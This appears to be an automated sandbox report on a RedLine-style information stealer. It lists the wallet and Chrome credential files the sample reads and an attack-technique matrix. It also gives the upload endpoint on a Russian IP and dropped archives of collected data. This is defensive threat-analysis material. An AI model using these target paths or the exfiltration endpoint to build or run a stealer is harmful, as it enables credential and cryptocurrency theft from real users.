      Stealing of Sensitive Information

      barindex
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: Yara matchFile source: 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7152, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts131
      Windows Management Instrumentation
      Path Interception311
      Process Injection
      1
      Masquerading
      1
      OS Credential Dumping
      1
      System Time Discovery
      Remote Services1
      Input Capture
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools
      1
      Input Capture
      151
      Security Software Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      Exfiltration Over Bluetooth11
      Non-Standard Port
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)141
      Virtualization/Sandbox Evasion
      Security Account Manager11
      Process Discovery
      SMB/Windows Admin Shares2
      Data from Local System
      Automated Exfiltration1
      Ingress Tool Transfer
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
      Process Injection
      NTDS141
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput CaptureScheduled Transfer3
      Non-Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingData Transfer Size Limits3
      Application Layer Protocol
      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common2
      Obfuscated Files or Information
      Cached Domain Credentials1
      Remote System Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      System Network Configuration Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      File and Directory Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow54
      System Information Discovery
      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      file.exe57%ReversingLabsWin32.Trojan.RedLine
      file.exe56%VirustotalBrowse
      file.exe100%AviraHEUR/AGEN.1305142
      file.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://ip-api.com40%URL Reputationsafe
      http://ip-api.com40%URL Reputationsafe
      http://subca.ocsp-certum.com050%URL Reputationsafe
      http://subca.ocsp-certum.com020%URL Reputationsafe
      http://subca.ocsp-certum.com010%URL Reputationsafe
      http://85.192.63.194:500140%Avira URL Cloudsafe
      http://85.192.63.194:50010%Avira URL Cloudsafe
      http://85.192.63.194:5001/uploadfile0%Avira URL Cloudsafe
      http://85.192.63.194:50012%VirustotalBrowse
      http://85.192.63.194:5001/uploadfile7%VirustotalBrowse
      http://85.192.630%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      ip-api.com
      208.95.112.1
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://ip-api.com/jsonfalse
          high
          http://85.192.63.194:5001/uploadfilefalse
          • 7%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drfalse
            high
            http://crl.certum.pl/ctsca2021.crl0ofile.exefalse
              high
              https://duckduckgo.com/ac/?q=tmp7F48.tmp.dat.2.drfalse
                high
                http://repository.certum.pl/ctnca.cer09file.exefalse
                  high
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drfalse
                    high
                    http://crl.certum.pl/ctnca.crl0kfile.exefalse
                      high
                      https://search.yahoo.com?fr=crmas_sfpfInstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drfalse
                        high
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp7F48.tmp.dat.2.drfalse
                          high
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchInstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drfalse
                            high
                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=InstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drfalse
                              high
                              http://85.192.63.194:50014InstallUtil.exe, 00000002.00000002.449788785.00000000031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ip-api.com4InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://ac.ecosia.org/autocomplete?q=tmp7F48.tmp.dat.2.drfalse
                                high
                                https://search.yahoo.com?fr=crmas_sfpInstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drfalse
                                  high
                                  http://85.192.63InstallUtil.exe, 00000002.00000002.449788785.00000000031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://repository.certum.pl/ctsca2021.cer0file.exefalse
                                    high
                                    http://85.192.63.194:5001InstallUtil.exe, 00000002.00000002.449788785.00000000031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 2%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://subca.ocsp-certum.com05file.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://subca.ocsp-certum.com02file.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://subca.ocsp-certum.com01file.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.certum.pl/ctnca2.crl0lfile.exefalse
                                      high
                                      http://repository.certum.pl/ctnca2.cer09file.exefalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp7F48.tmp.dat.2.drfalse
                                            high
                                            http://www.certum.pl/CPS0file.exefalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              208.95.112.1
                                              ip-api.comUnited States
                                              53334TUT-ASUSfalse
                                              193.233.232.195
                                              unknownRussian Federation
                                              2895FREE-NET-ASFREEnetEUfalse
                                              85.192.63.194
                                              unknownRussian Federation
                                              47711LINEGROUP-ASRUfalse
                                              Joe Sandbox Version:37.1.0 Beryl
                                              Analysis ID:874613
                                              Start date and time:2023-05-24 14:08:45 +02:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 8m 53s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:5
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:file.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@4/12@1/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 99.8% (good quality ratio 93.6%)
                                              • Quality average: 76.5%
                                              • Quality standard deviation: 29.6%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 108
                                              • Number of non-executed functions: 46
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Stop behavior analysis, all processes terminated
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              TimeTypeDescription
                                              14:10:30API Interceptor8x Sleep call for process: InstallUtil.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              208.95.112.11684920551ea8204bc6deacfb8b581a1ec6249e9488b3fd21fef67ff4e7514a570b18027fd948.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                              • ip-api.com/json/
                                              68850.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              00912938pdf.jsGet hashmaliciousWSHRATBrowse
                                              • ip-api.com/json/
                                              purchase_order.htaGet hashmaliciousGurcu StealerBrowse
                                              • ip-api.com/line?fields=query,country
                                              purchase_order.vbsGet hashmaliciousGurcu StealerBrowse
                                              • ip-api.com/line?fields=query,country
                                              file.exeGet hashmaliciousBlackGuardBrowse
                                              • ip-api.com/json/
                                              file.exeGet hashmaliciousBlackGuardBrowse
                                              • ip-api.com/json/
                                              snake.exeGet hashmaliciousGurcu StealerBrowse
                                              • ip-api.com/line?fields=query,country
                                              wLQkz3Iiof.exeGet hashmaliciousUnknownBrowse
                                              • ip-api.com/line/?fields=hosting
                                              chrome-upd13111.apkGet hashmaliciousUnknownBrowse
                                              • www.ip-api.com/json
                                              05212023840.jsGet hashmaliciousWSHRATBrowse
                                              • ip-api.com/json/
                                              Request_For_Quotation.jsGet hashmaliciousWSHRATBrowse
                                              • ip-api.com/json/
                                              Payment_Notification.jsGet hashmaliciousWSHRATBrowse
                                              • ip-api.com/json/
                                              Scan00518.jsGet hashmaliciousWSHRATBrowse
                                              • ip-api.com/json/
                                              snake.exeGet hashmaliciousGurcu StealerBrowse
                                              • ip-api.com/line?fields=query,country
                                              version_v319.exeGet hashmaliciousUnknownBrowse
                                              • ip-api.com/line/?fields=hosting
                                              testing2.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              Phoenix.exeGet hashmaliciousBlank GrabberBrowse
                                              • ip-api.com/line/?fields=hosting
                                              testing2protected.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              SpecSpoofer.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ip-api.com1684920551ea8204bc6deacfb8b581a1ec6249e9488b3fd21fef67ff4e7514a570b18027fd948.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                              • 208.95.112.1
                                              68850.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                              • 208.95.112.1
                                              snake.exeGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                              • 208.95.112.1
                                              00912938pdf.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              purchase_order.htaGet hashmaliciousGurcu StealerBrowse
                                              • 208.95.112.1
                                              purchase_order.vbsGet hashmaliciousGurcu StealerBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousBlackGuardBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousBlackGuardBrowse
                                              • 208.95.112.1
                                              PATitleRequest .htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 193.234.225.88
                                              snake.exeGet hashmaliciousGurcu StealerBrowse
                                              • 208.95.112.1
                                              wLQkz3Iiof.exeGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              05212023840.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              Request_For_Quotation.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              Payment_Notification.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              Scan00518.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              snake.exeGet hashmaliciousGurcu StealerBrowse
                                              • 208.95.112.1
                                              version_v319.exeGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              testing2.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • 208.95.112.1
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              FREE-NET-ASFREEnetEUqP7dcYYdWE.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                                              • 193.233.233.140
                                              generator707.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, StealcBrowse
                                              • 193.233.233.140
                                              game225.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoaderBrowse
                                              • 193.233.233.140
                                              mixar.exeGet hashmaliciousStealc, VidarBrowse
                                              • 193.233.134.93
                                              muqiOwEL5R.jsGet hashmaliciousUnknownBrowse
                                              • 193.233.233.92
                                              https://1drv.ms/w/s!Am6waQEdILyxdeFdmy_wAfO0KXwGet hashmaliciousUnknownBrowse
                                              • 193.233.134.79
                                              https://onedrive.live.com/view.aspx?resid=A29DCD3C017058A5!127&ithint=file,docx&wdo=2&authkey=!AKT830h4cyyfzKsGet hashmaliciousUnknownBrowse
                                              • 193.233.134.79
                                              https://bit.ly/3Mi8yQaGet hashmaliciousUnknownBrowse
                                              • 193.233.134.79
                                              http://m6937g.qudara.ccGet hashmaliciousUnknownBrowse
                                              • 193.233.134.79
                                              startup.dll.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 193.233.134.86
                                              http://op9v35.vewerta.cc/34546de4235m342356Get hashmaliciousUnknownBrowse
                                              • 193.233.134.79
                                              Stemix.exeGet hashmaliciousStealc, VidarBrowse
                                              • 193.233.134.93
                                              doc8208932_6605640_1.jsGet hashmaliciousUnknownBrowse
                                              • 193.233.233.92
                                              doc8208932_6605640_1.jsGet hashmaliciousUnknownBrowse
                                              • 193.233.233.92
                                              https://bit.ly/416LmK1Get hashmaliciousUnknownBrowse
                                              • 193.233.134.79
                                              qnxkc5slHC.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 193.233.134.80
                                              toolspub1.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 193.233.134.80
                                              cjDX3dEa6r.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 193.233.134.80
                                              orwpdQFD5v.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 193.233.134.80
                                              yuegj44pTc.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 193.233.134.80
                                              TUT-ASUS1684920551ea8204bc6deacfb8b581a1ec6249e9488b3fd21fef67ff4e7514a570b18027fd948.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                              • 208.95.112.1
                                              68850.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                              • 208.95.112.1
                                              snake.exeGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              00912938pdf.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              purchase_order.htaGet hashmaliciousGurcu StealerBrowse
                                              • 208.95.112.1
                                              purchase_order.vbsGet hashmaliciousGurcu StealerBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousBlackGuardBrowse
                                              • 208.95.112.1
                                              file.exeGet hashmaliciousBlackGuardBrowse
                                              • 208.95.112.1
                                              snake.exeGet hashmaliciousGurcu StealerBrowse
                                              • 208.95.112.1
                                              wLQkz3Iiof.exeGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              chrome-upd13111.apkGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              05212023840.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              Request_For_Quotation.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              Payment_Notification.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              Scan00518.jsGet hashmaliciousWSHRATBrowse
                                              • 208.95.112.1
                                              snake.exeGet hashmaliciousGurcu StealerBrowse
                                              • 208.95.112.1
                                              version_v319.exeGet hashmaliciousUnknownBrowse
                                              • 208.95.112.1
                                              testing2.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • 208.95.112.1
                                              Phoenix.exeGet hashmaliciousBlank GrabberBrowse
                                              • 208.95.112.1
                                              No context
                                              No context
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1537
                                              Entropy (8bit):5.365372657477488
                                              Encrypted:false
                                              SSDEEP:48:MxHKXwYHKhQnoPtHoxHhAHKzv7HG1qHjHK9HK+HKoHK:iqXwYqhQnoPtIxHeqzjmwDq9q+qoq
                                              MD5:B7AEB06595355BCF5CC32F01B9BCCCAE
                                              SHA1:A1336BBBF39EAFF0182ADEBE6619082F3C48D9DC
                                              SHA-256:D7AFE14B632165CF0CE2AB27840624FDF3F5D3E4D52F0D48990A82E25120BECB
                                              SHA-512:9F09D98517FEC9EAFE95328644A90692C2699A27D04DF7C382443FB0C2A63E5941A34EFEA481B85949B03531D394874AC8E95C0752B5AED9AB6523EF467C76EA
                                              Malicious:false
                                              Reputation:low
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKe
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                              Category:dropped
                                              Size (bytes):49152
                                              Entropy (8bit):0.7876734657715041
                                              Encrypted:false
                                              SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                              MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                              SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                              SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                              SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                              Category:dropped
                                              Size (bytes):28672
                                              Entropy (8bit):0.4393511334109407
                                              Encrypted:false
                                              SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                              MD5:8C31C5487A97BBE73711C5E20600C1F6
                                              SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                              SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                              SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                              Malicious:false
                                              Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                              Category:dropped
                                              Size (bytes):94208
                                              Entropy (8bit):1.2889923589460437
                                              Encrypted:false
                                              SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                              MD5:7901DD9DF50A993306401B7360977746
                                              SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                              SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                              SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                              Malicious:false
                                              Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                              Category:dropped
                                              Size (bytes):88650
                                              Entropy (8bit):7.995845561610413
                                              Encrypted:true
                                              SSDEEP:1536:j8+sJ5f4RXqdWE0p5k3AmGVqCBueq79qQvvf1vCQr9auHNA4hEkC6m3:j8+sT4X8AmGdw7QYfxJa4A4uT6m3
                                              MD5:D7F030C63533E519BCD35BA57B017B7C
                                              SHA1:C9C72663515EA4224415F1ECFBEEEE159FA5CD7B
                                              SHA-256:E0C0F307035386D6191A95CCAF4E418CFFCA0F604D026993790C9FBB1E719D9D
                                              SHA-512:0EED9BEFBC1009D8E366D901A49250169C2008768DEB1779C15A1CEC34110AB66E6AADA0BC6C3E2750D928CEB92A40EFB0BA0DBF739CA821EB3C9E9E9FCFA86E
                                              Malicious:false
                                              Preview:PK........:q.V.1Y.h...........Information.txteQAN.0...+....mR;....)..-.-.)...q.E.T.#(...|..*..s@B ....x.3~.U..te.0...Y...<....j..G...R.|.7Vo.!...$F..ce....V..F.....+T..Y*.G....../..S{.....s..af+.$...ua&..;........*...0...c.{.. f.1A.....{.W.o3..[...<.z..]a'..A..]L.-..U...l%pj.*;....U..y7F?.$!.3....'.0n..x./...8..d4..!,.....(..KD1."....N.nu~...V.B..#....5.)[....^..t._.....2?...Y.*"{sz.7....6.oPK........Cq.Vh.......T......Processes.txt.KS.H...|.".{!TOI.h..v.5C.... ...7..H....[../IX.g_.*.*......,.....g..a.:z.......C..yp~{~|xz<.......\...l&....([e....z..........._......r>.....v.oE.P.g..'.<..*.......o...../.......Svs.......o.....O....O.?O...(......VW_.>Mn..F..n.>.v.Q.*..*"V.6:.,..{....(J..UQD.........Z......=g........X.3._ .).i..f.IV..8=.x.W.8...-R6..'+..\........<M]..|Ys.....(...2..`R.#...4.].>{|L. +H.U.8.Y{.....~.2P.f6.V.^.W..X...ML...z..`y......x-3T(D....6'"O.PNq .S;.`.d..yzKG.v.)$=.r.....m>..'QQKD.WYA.i..Y.G/...+pzUf..h. ...... .v.oB...8.h. Gg.<B8.v.xv..
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              File Type:Unicode text, UTF-8 text
                                              Category:dropped
                                              Size (bytes):473
                                              Entropy (8bit):5.556871807242889
                                              Encrypted:false
                                              SSDEEP:6:0MQaSiiyRo1j0+4BjeGBf3tUA7lx2Idvse4vzWYumZrZYCRViA7bvFIpsUh8Nn:0MQ4DiYxkJAP2Ut4qYhZYKh8Bh8N
                                              MD5:D510C02C0E3D3E1EEA2047FB36FC648E
                                              SHA1:637A1DCA445EF319D46645C1D56A2D73EABE4450
                                              SHA-256:8584D4B4D64141BFD7CDDAEAAB6F5327BC179288F0205B52DBED7F918A566FA5
                                              SHA-512:1F826EB53C70B53A1A15859DDF3DB37B4A56A10A808A5EF178D43A11374EB88A1AD4902DB69869460F01516FADD142AEAF784B0337280E27279BEFE607DABB12
                                              Malicious:false
